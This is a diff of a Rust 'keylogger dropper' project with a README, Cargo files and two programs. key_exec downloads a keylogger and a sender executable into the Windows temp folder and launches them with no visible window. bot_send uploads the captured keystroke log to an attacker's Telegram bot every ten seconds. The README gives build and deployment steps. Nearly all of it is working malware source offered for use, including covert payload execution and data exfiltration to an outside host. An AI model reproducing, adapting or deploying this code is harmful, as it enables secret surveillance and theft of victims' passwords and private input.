Keylogger dropper

An Dropper that downloads keylogger and sender in Users temp, runs in background process and sends the .log files using telegram bot.

Author: Whitecat18

keylog_dropper/README.md

@@ -0,0 +1,36 @@
+# Keyload dropper AKA Keylogger Dropper
+
+### What is this ?
+
+This is an dropper used to download keylogger and sender and exectute in background. 
+
+### How does it work ?
+
+When you execute the dropper, The keylogger and its sender will be dropped at Users Temp directory. 
+
+Next, it will use windows API [CreateProcessW](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessw) to execute the program as background.
+
+It uses telegram bot to send the keycap.log(an file which stores keylog information) file for every 10 seconds. You can change the thread::sleep depend upon your needs 
+
+### How to implement it ?
+
+Just Clone these and compile both the programs. 
+
+For key_exec: Change the URL.
+
+For bot_send : Enter your telegram [BOT TOKEN](https://www.cytron.io/tutorial/how-to-create-a-telegram-bot-get-the-api-key-and-chat-id) and your [CHAT ID](https://www.alphr.com/find-chat-id-telegram/).
+
+```
+cargo build --release
+```
+
+Host the file anywhere and execute the key_exec.exe
+
+### Demos.
+
+![exection](./pic/pic1.png)
+
+
+
+By 5mukx
+

keylog_dropper/bot_send/Cargo.toml

@@ -0,0 +1,8 @@
+[package]
+name = "bot_send"
+version = "0.1.0"
+edition = "2021"
+
+[dependencies]
+reqwest = {version="0.12.5", features = ["blocking", "multipart"] }
+tokio = {version = "1.38.0", features= ["full"]}

keylog_dropper/bot_send/src/main.rs

@@ -0,0 +1,65 @@
+use std::fs::File;
+use std::thread;
+use std::time::Duration;
+use reqwest::blocking::{Client, multipart};
+use std::error::Error;
+use std::env::temp_dir;
+use std::path::PathBuf;
+
+const TELEGRAM_BOT_TOKEN: &str = "ENTER YOU BOT TOKEN HERE";
+const TELEGRAM_CHAT_ID: &str = "ENTER YOUR CHAT ID";
+
+
+fn get_log_file_path() -> PathBuf {
+    temp_dir().join("keycap.log")
+}
+    
+fn read_log_file() -> Result<File, Box<dyn Error>> {
+    let file_path = get_log_file_path();
+    let file = File::open(&file_path)?;
+    Ok(file)
+}
+
+fn send_file_to_telegram(file_path: &PathBuf) -> Result<(), Box<dyn Error>> {
+    let client = Client::new();
+    let url = format!(
+        "https://api.telegram.org/bot{}/sendDocument",
+        TELEGRAM_BOT_TOKEN
+    );
+
+    let form = multipart::Form::new()
+        .text("chat_id", TELEGRAM_CHAT_ID.to_string())
+        .file("document", file_path)?;
+
+    let response = client.post(&url).multipart(form).send()?;
+
+    if response.status().is_success() {
+        Ok(())
+    } else {
+        let response_text = response.text()?;
+        println!("Response: {}", response_text);
+        Err(Box::from(format!(
+            "Failed to send file: {}",
+            response_text
+        )))
+    }
+}
+
+fn main() {
+    loop {
+        match read_log_file() {
+            Ok(_) => {
+                let file_path = get_log_file_path();
+                match send_file_to_telegram(&file_path) {
+                    Ok(_) => {
+                        println!("Log file sent successfully.");
+                    }
+                    Err(e) => eprintln!("Failed to send log file: {}", e),
+                }
+            }
+            Err(e) => eprintln!("Failed to read log file: {}", e),
+        }
+
+        thread::sleep(Duration::from_secs(10));
+    }
+}

keylog_dropper/key_exec/Cargo.toml

@@ -0,0 +1,11 @@
+[package]
+name = "key_exec"
+version = "0.1.0"
+edition = "2021"
+
+[dependencies]
+futures-util = "0.3.30"
+reqwest = {version= "0.12.5", features = ["blocking", "stream"]}
+tokio = {version = "1.38.0", features= ["full"]}
+widestring = "1.1.0"
+winapi = { version = "0.3.9", features = ["winuser","setupapi","wlanapi","winnls","fileapi","sysinfoapi", "fibersapi","debugapi","winerror", "wininet" , "winhttp" ,"synchapi","securitybaseapi","wincrypt","psapi", "tlhelp32", "heapapi","shellapi", "memoryapi", "processthreadsapi", "errhandlingapi", "winbase", "handleapi", "synchapi"] }

keylog_dropper/key_exec/src/main.rs

@@ -0,0 +1,135 @@
+use futures_util::StreamExt;
+use tokio::fs::File;
+use tokio::io::AsyncWriteExt;
+use reqwest::Client;
+use winapi::um::errhandlingapi::GetLastError;
+use std::env::temp_dir;
+use std::ptr::null_mut;
+use winapi::um::processthreadsapi::{CreateProcessW, PROCESS_INFORMATION, STARTUPINFOW};
+use winapi::um::winbase::CREATE_NO_WINDOW;
+use widestring::WideCString;
+
+#[tokio::main]
+async fn main() {
+
+    // Replace your URL
+    let url1 = "http://localhost/keylogger.exe";
+    let url2 = "http://localhost/bot_send.exe";
+
+    let temp_path1 = temp_dir().join("keylog.exe");
+    let temp_path2 = temp_dir().join("keylog_sender.exe");
+
+    let client = Client::new();
+
+    let download1 = download_file(&client, url1, &temp_path1);
+    let download2 = download_file(&client, url2, &temp_path2);
+
+    let (result1, result2) = tokio::join!(download1, download2);
+
+    match (&result1, &result2) {
+        (Ok(_), Ok(_)) => {
+            println!("Both filed Deployed successfully.");
+
+            let execute1 = execute_file(&temp_path1);
+            let execute2 = execute_file(&temp_path2);
+
+            let (exec_result1, exec_result2) = tokio::join!(execute1, execute2);
+
+            if exec_result1 && exec_result2 {
+                println!("Both files executed in background.");
+            } else {
+                println!("Failed to execute one or both files in the background.");
+            }
+        }
+        _ => {
+            if let Err(e) = &result1 {
+                println!("Failed to download file 1: {:?}", e);
+            }
+            if let Err(e) = &result2 {
+                println!("Failed to download file 2: {:?}", e);
+            }
+        }
+    }
+}
+
+async fn download_file(client: &Client, url: &str, path: &std::path::Path) -> Result<(), Box<dyn std::error::Error>> {
+    let response = client.get(url).send().await?;
+
+    if response.status().is_success() {
+        let mut file = File::create(path).await?;
+
+        let mut stream = response.bytes_stream();
+        while let Some(chunk) = stream.next().await {
+            let chunk = chunk?;
+            file.write_all(&chunk).await?;
+        }
+
+        drop(file);
+        Ok(())
+    } else {
+        Err(Box::new(std::io::Error::new(
+            std::io::ErrorKind::Other,
+            format!("Failed to download file: HTTP {}", response.status()),
+        )))
+    }
+}
+
+async fn execute_file(path: &std::path::Path) -> bool {
+    let exe_path = WideCString::from_str(path.to_string_lossy()).unwrap();
+    
+    // let mut si = STARTUPINFOW {
+    //     cb: std::mem::size_of::<STARTUPINFOW>() as u32,
+    //     lpReserved: null_mut(),
+    //     lpDesktop: null_mut(),
+    //     lpTitle: null_mut(),
+    //     dwX: 0,
+    //     dwY: 0,
+    //     dwXSize: 0,
+    //     dwYSize: 0,
+    //     dwXCountChars: 0,
+    //     dwYCountChars: 0,
+    //     dwFillAttribute: 0,
+    //     dwFlags: 0,
+    //     wShowWindow: 0,
+    //     cbReserved2: 0,
+    //     lpReserved2: null_mut(),
+    //     hStdInput: null_mut(),
+    //     hStdOutput: null_mut(),
+    //     hStdError: null_mut(),
+    // };
+
+    // OR
+
+    let mut si: STARTUPINFOW = unsafe{ std::mem::zeroed() };
+    si.cb = std::mem::size_of::<STARTUPINFOW>() as u32;
+
+    let mut pi = PROCESS_INFORMATION {
+        hProcess: null_mut(),
+        hThread: null_mut(),
+        dwProcessId: 0,
+        dwThreadId: 0,
+    };
+
+    let result = unsafe {
+        CreateProcessW(
+            null_mut(),
+            exe_path.into_raw(),
+            null_mut(),
+            null_mut(),
+            false as i32,
+            CREATE_NO_WINDOW,
+            null_mut(),
+            null_mut(),
+            &mut si,
+            &mut pi,
+        )
+    };
+
+    if result != 0 {
+        true
+    } else {
+        let error_code = unsafe { GetLastError() };
+        println!("Failed to execute file in the background. Error code: {}", error_code);
+        false
+    }
+}